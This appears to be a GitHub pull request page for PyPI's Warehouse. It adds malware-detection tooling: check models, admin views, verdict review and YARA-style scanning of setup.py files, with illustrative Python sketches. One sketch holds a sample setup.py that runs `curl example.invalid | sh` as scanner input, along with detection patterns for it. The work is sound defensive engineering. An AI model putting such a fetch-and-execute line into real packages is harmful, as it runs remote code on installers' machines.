Tooling for automated detection of malware #7377

ewdurbin · 2020-02-11T19:52:54Z

Design and implementation work by @xmunoz, example checks by @woodruffw.

* Add new models for malware detection. Fixes #7090 and #7092.
* Code review changes.
  - FK on release_file.id field instead of md5
  - Change message type from String to Text
  - Change Enum class in model to singular form

* Add admin interface to view and enable checks
  - Implement list, detail and change_state views (#7133)
  - Add unit tests for check admin view
* Add comprehensive test coverage for check admin

* Add initial hook-based check execution mechanism
* scratch/poc
* Add initial hook-based check execution mechanism
* Use sqlalchemy event hooks for malware checks
* Fix unit tests
* Add enum for MalwareCheckObjectType
* Add unit tests for init.
* Add tests for tasks, services, and utils. Also, some small bugfixes in MalwareCheckFactory and the get_enabled_checks method.
* Fix spurious task test.
* Add missing drop enum to downgrade function.
* Added TODO to dev/environment
* Be more explicit in check lookup

Co-authored-by: Ernest W. Durbin III <ewdurbin@gmail.com>
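The hook-based mechanism listed above can be pictured roughly as follows. This is a minimal standard-library sketch, not Warehouse's code: the SQLAlchemy event hook is replaced by an explicit `notify_created` call, and `HookRegistry`, `register`, `notify_created`, and the enum member names are hypothetical. Only `MalwareCheckObjectType` and `get_enabled_checks` are names taken from the commit messages.

```python
import enum
from collections import defaultdict


class MalwareCheckObjectType(enum.Enum):
    # Member names are assumptions; the PR only names the enum itself.
    File = "file"
    Release = "release"
    Project = "project"


class HookRegistry:
    """Maps an object type to the checks that want to see new objects of that type."""

    def __init__(self):
        self._checks = defaultdict(list)
        self.queued = []  # stands in for a task queue

    def register(self, object_type, check_name, enabled=True):
        self._checks[object_type].append((check_name, enabled))

    def get_enabled_checks(self, object_type):
        return [name for name, enabled in self._checks[object_type] if enabled]

    def notify_created(self, object_type, object_id):
        # In the PR this role is played by a SQLAlchemy event hook;
        # here it is an explicit call so the sketch has no dependencies.
        for name in self.get_enabled_checks(object_type):
            self.queued.append((name, object_id))


registry = HookRegistry()
registry.register(MalwareCheckObjectType.File, "ExampleHookedCheck")
registry.register(MalwareCheckObjectType.File, "DisabledCheck", enabled=False)
registry.notify_created(MalwareCheckObjectType.File, object_id=42)
print(registry.queued)
```

Only the enabled check is queued for the new object; disabled checks stay registered but are skipped at dispatch time.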

* Add malware check syncing mechanism
* Code review changes.

* Refactor MalwareCheckBase. Fixes #7091.
  Add Foreign Keys in MalwareVerdicts for other types of objects (Releases, Projects).
* Change verdict dict to kwargs.

* Add wipe-out functionality
  Related: #7133
* Call list explicitly

* Add rudimentary verdicts view. Progress on #6062.
  Also, add some better testing logic for wiped_out condition.
* Code review changes.
  - Conditionally show fields that are populated
  - JSON pretty formatting
* Fix unit test bug.
  - Use `get` instead of `filter` to look up verdict by pkey.
* simplify unit tests for verdicts view

* introduce malware queue
* correct syntax, apparently list of tuples documented doesn't work.

* Add backfill functionality to check admin #7094
  - Add backfill task
  - Change lookup of checks to check_name instead of id
  - Load checks that are also in "evaluation" state
* Add unit tests for backfill.
  - Log number of runs executed by backfill
  - Perform basic validation on sample_rate input
  - Clean up other testing logic.
* Remove superfluous 'all()'
* Code review changes.
  - Set backfill size to a fixed number, not configurable via web UI.
  - Backfill task enqueues run_check tasks
  - Only retry if `check.run` fails, not if loading the check fails.
  - Use exponential backoff for retries.
* Update warehouse/admin/templates/admin/malware/checks/detail.html

Co-authored-by: Ernest W. Durbin III <ewdurbin@gmail.com>
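The retry rules from the code review ("only retry if `check.run` fails" and "use exponential backoff") could look something like the sketch below. It is a plain-Python illustration under assumptions, not the task implementation in this PR: `run_check_with_retries`, `FlakyCheck`, and the `max_retries` and `base_delay` parameters are hypothetical, and the real code runs inside a task queue rather than a loop.

```python
import time


def run_check_with_retries(load_check, max_retries=3, base_delay=1.0, sleep=time.sleep):
    # Loading happens outside the retry loop, so a failure to load is never retried.
    check = load_check()
    for attempt in range(max_retries + 1):
        try:
            return check.run()
        except Exception:
            if attempt == max_retries:
                raise
            # Exponential backoff: base_delay, 2 * base_delay, 4 * base_delay, ...
            sleep(base_delay * 2 ** attempt)


class FlakyCheck:
    """Hypothetical check whose run() fails twice before succeeding."""

    def __init__(self):
        self.calls = 0

    def run(self):
        self.calls += 1
        if self.calls < 3:
            raise RuntimeError("transient failure")
        return "ok"


delays = []
# Record the delays instead of sleeping so the example finishes instantly.
result = run_check_with_retries(FlakyCheck, sleep=delays.append)
print(result, delays)
```

Passing `sleep` as a parameter keeps the backoff schedule easy to inspect in tests without waiting for real time to pass.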

- Add `schedule` field to MalwareCheck model #7096
- Move ExampleCheck into tests/common/ to remove test dependency from prod code
- Rename functions and classes to differentiate between "hooked" and "scheduled" checks

* requirements: Introduce yara
* [WIP] malware/check: SetupPatternCheck
  In progress. Introduces SetupPatternCheck, an implementation of an event-based check that scans the `setup.py`s of release files for suspicious patterns.
* malware/checks: Give MalwareCheckBase.run/scan args, kwargs
* malware: Add check preparation
  Fiddle with the check/run signature a bit more.
* malware/checks: Unpack file path correctly
* docker-compose: Override FILES_BACKEND for worker
  The worker needs to be able to see the "files" virtual host during development so that malware checks can fetch their underlying release files.
* [WIP] malware/checks: setup.py extraction
* malware/checks: setup_patterns: Fix enum, seek
* malware/checks: setup_patterns: Apply YARA rules
  Each rule match becomes a verdict.
* malware/checks: setup_patterns: Prefer get over filter
* warehouse/{admin,malware}: Consistent enum names
  Also enforce uniqueness for enum values.
* warehouse/{admin,malware}: More enum changes
* tests: Update admin, malware tests
* tests: Fix enum, more test fixes
* tests: Add prepare tests
* malware/changes: base: Unpack id correctly
* tests: Begin adding SetupPatternCheck tests
* malware/checks: setup_patterns: Fix enum
* tests: More SetupPatternCheck tests
* warehouse/malware: setup_patterns: Fix enums
* tests: More SetupPatternCheck tests
* tests: Add license header
* malware/checks: setup_patterns: Add TODO
* tests: More SetupPatternCheck tests
* tests: More SetupPatternCheck tests
* tests: Complete extraction tests for SetupPatternCheck
* tests: Fix test
* malware/checks: Add docstring for prepare
* malware/checks: blacken
* malware/checks: Document, expand YARA rules
* tests, warehouse: Restructure utilities
* malware: Order some enums, reduce SetupPatternCheck verdicts
* malware/models: Add missing __lt__
* malware/checks: Always embed the model object in the prepared arguments
  Use it instead of performing a DB request in the check itself.
* malware/checks: Avoid raw bytes
* malware/changes: Remove unused import
* tests: Fixup malware tests
* warehouse/malware: blacken
* tests: Fill in malware coverage
* tests, warehouse: Add a benign verdict for SetupPatternCheck
* tests: blacken
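To make the SetupPatternCheck idea concrete (extract `setup.py` from a release file, scan it, and turn each rule match into a verdict), here is a rough standard-library sketch. It is not the check added in this PR: regular expressions stand in for YARA rules, only `.tar.gz` sdists are handled, and the rule names and the helpers `extract_setup_py`, `scan_setup_py`, and `make_sdist` are all hypothetical.

```python
import io
import re
import tarfile

# Hypothetical patterns standing in for YARA rules.
SUSPICIOUS_PATTERNS = {
    "process_spawn_in_setup": re.compile(r"\b(os\.system|subprocess\.(Popen|call|run))\b"),
    "networking_in_setup": re.compile(r"\b(urllib|socket|requests)\b"),
}


def extract_setup_py(sdist_bytes):
    """Return the text of the top-level setup.py in a .tar.gz sdist, or None."""
    with tarfile.open(fileobj=io.BytesIO(sdist_bytes), mode="r:gz") as archive:
        for member in archive.getmembers():
            # A top-level setup.py looks like "<name>-<version>/setup.py".
            parts = member.name.split("/")
            if member.isfile() and len(parts) == 2 and parts[1] == "setup.py":
                return archive.extractfile(member).read().decode("utf-8", errors="replace")
    return None


def scan_setup_py(source):
    """Return one rule name per matching pattern (each match would become a verdict)."""
    return sorted(name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(source))


def make_sdist(setup_source):
    """Build a tiny in-memory sdist so the example needs no files on disk."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w:gz") as archive:
        data = setup_source.encode("utf-8")
        info = tarfile.TarInfo(name="demo-1.0/setup.py")
        info.size = len(data)
        archive.addfile(info, io.BytesIO(data))
    return buffer.getvalue()


sdist = make_sdist("import os\nos.system('curl example.invalid | sh')\n")
verdicts = scan_setup_py(extract_setup_py(sdist))
print(verdicts)
```

An empty result here would correspond to the benign case; how the actual check records a benign verdict is not shown in the commit messages, so it is left out of the sketch.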

* Implement scheduled checks #7093
  - Rename `run_backfill` to `run_evaluation` in admin malware view
  - Modify `run` and `scan` method signatures to accept `**kwargs`
  - Extend `run_check` to accommodate scheduled check functionality
* Reduce unit test flakiness
* Code review changes.
  Also replace `check.hooked_object` with `check.hooked_object.value` in check detail template.
* tests, warehouse: enum fixes
* Fix lint error

Co-authored-by: William Woodruff <william@yossarian.net>

* Add verdicts view filtering capabilities #6062.
* Code review changes.
  - Refactor tests to be parametrized.
  - Pass `_query` to `route_path` in template.
  - Remove `is None` from filter query, it adds nothing.
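As a loose illustration of the filtering behavior, the sketch below narrows a list of verdicts by whichever query parameters are actually supplied. It is an in-memory stand-in, not the admin view's database query: the `Verdict` dataclass, its field names, the confidence values, and `filter_verdicts` are assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass
class Verdict:
    # Field names are assumptions; the real model is not shown in this PR text.
    check_name: str
    classification: str
    confidence: str


def filter_verdicts(verdicts, **params):
    """Keep verdicts matching every supplied parameter; empty or missing values are ignored."""
    active = {field: value for field, value in params.items() if value}
    return [
        verdict
        for verdict in verdicts
        if all(getattr(verdict, field) == value for field, value in active.items())
    ]


all_verdicts = [
    Verdict("SetupPatternCheck", "threat", "high"),
    Verdict("SetupPatternCheck", "benign", "low"),
    Verdict("PackageTurnoverCheck", "threat", "low"),
]

# An empty string (as an unset form field would send) does not restrict the result.
by_check = filter_verdicts(all_verdicts, check_name="SetupPatternCheck", classification="")
threats = filter_verdicts(all_verdicts, classification="threat")
print(len(by_check), len(threats))
```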

* Add verdict administrator review. Fixes #6062.
  - Add new `admin.verdicts.review` endpoint
  - Change layout of verdict list and detail view and add forms
  - Change sort order of the MalwareChecks, and update the tests
* Code review changes.
  - Rename MalwareVerdict field `administrator_verdict` to `reviewer_verdict`.
  - Change verdict review permission from `admin` to `moderator`.

* Misc cleanup and TODOs on malware checks.
  - Change backfill function to invoke `IMalwareCheckService` interface
  - Add support for `kwargs` to `IMalwareCheckService` interface
  - Rename variable from reserved word `file` to `release_file`
  - Add `FatalCheckException` for non-retryable exceptions
  - Replace `MALWARE_CHECK_BACKEND` in dev/environment
* Make `IMalwareService` the entrypoint for `run_check`
  - Add `run_scheduled_check` task that invokes this interface.
  - Remove useless utility method
  - Move `FatalCheckException` into warehouse/malware/errors.py.
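The split between retryable and non-retryable failures might be sketched like this. Only the name `FatalCheckException` comes from the commit messages; the `run_once` helper, its return values, and the example check functions are hypothetical and show just the general idea of treating one exception type as "do not retry".

```python
class FatalCheckException(Exception):
    """Signals a failure that retrying cannot fix (behavior assumed for this sketch)."""


def run_once(check_run):
    """Run a check callable and report whether the caller should retry."""
    try:
        return ("done", check_run())
    except FatalCheckException as exc:
        # Non-retryable: give up immediately.
        return ("give_up", str(exc))
    except Exception as exc:
        # Anything else is treated as transient and eligible for a retry.
        return ("retry", str(exc))


def unknown_check():
    raise FatalCheckException("check is not registered")


def flaky_check():
    raise ConnectionError("file backend unavailable")


def healthy_check():
    return "no verdicts"


print(run_once(unknown_check))
print(run_once(flaky_check))
print(run_once(healthy_check))
```

The `FatalCheckException` clause has to come before the generic `Exception` clause, since it is a subclass and would otherwise be caught as retryable.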

* malware/checks: PackageTurnover skeleton
* malware/checks: PackageTurnover: Add NOTE
* malware/checks: PackageTurnoverCheck: more work
* tests: blacken
* malware/checks: More PackageTurnoverCheck work
* malware/checks: Blacken
* malware/checks: Blacken
* package_turnover: Promote from indeterminate to threat
* tests: Begin adding package_turnover tests
* tests: Add remaining package_turnover tests
* tests: Drop unused imports
* warehouse: Drop (ww) from NOTE
* checks/package_turnover: Drop NOTE

xmunoz mentioned this pull request Feb 11, 2020

Automated detection of malware: add documentation. Fixes #7095. #7369

Merged

di self-requested a review February 14, 2020 17:09

xmunoz and others added 16 commits February 18, 2020 15:07

Add new models for malware detection. (#7118)

b051793


Add admin interface to view and enable checks (#7134)

ce21ebf


Add malware check syncing mechanism (#7190)

7fd9964


Refactor MalwareCheckBase. Fixes #7091. (#7196)

d4dbeed


Add wipe-out functionality (#7202)

046dbc1


introduce malware queue (#7227)

a9572b9


Refactor testing logic #7098 (#7257)

16baaa7


Add verdicts view filtering capabilities #6062. (#7322)

6fe43a3


ewdurbin force-pushed the malware-detection branch from f3357b9 to f614bad Compare February 18, 2020 20:08

ewdurbin merged commit 557ca0e into master Feb 18, 2020

ewdurbin deleted the malware-detection branch February 18, 2020 23:06

This was referenced Feb 18, 2020

Detect malicious packages, for later removal #5117

Closed

Detect packages being published with typo'ish names #4998

Open

martintoreilly mentioned this pull request Jun 4, 2020

Process for adding python/R/Julia/Ubuntu/etc. packages alan-turing-institute/data-safe-haven#622

Closed

2 tasks
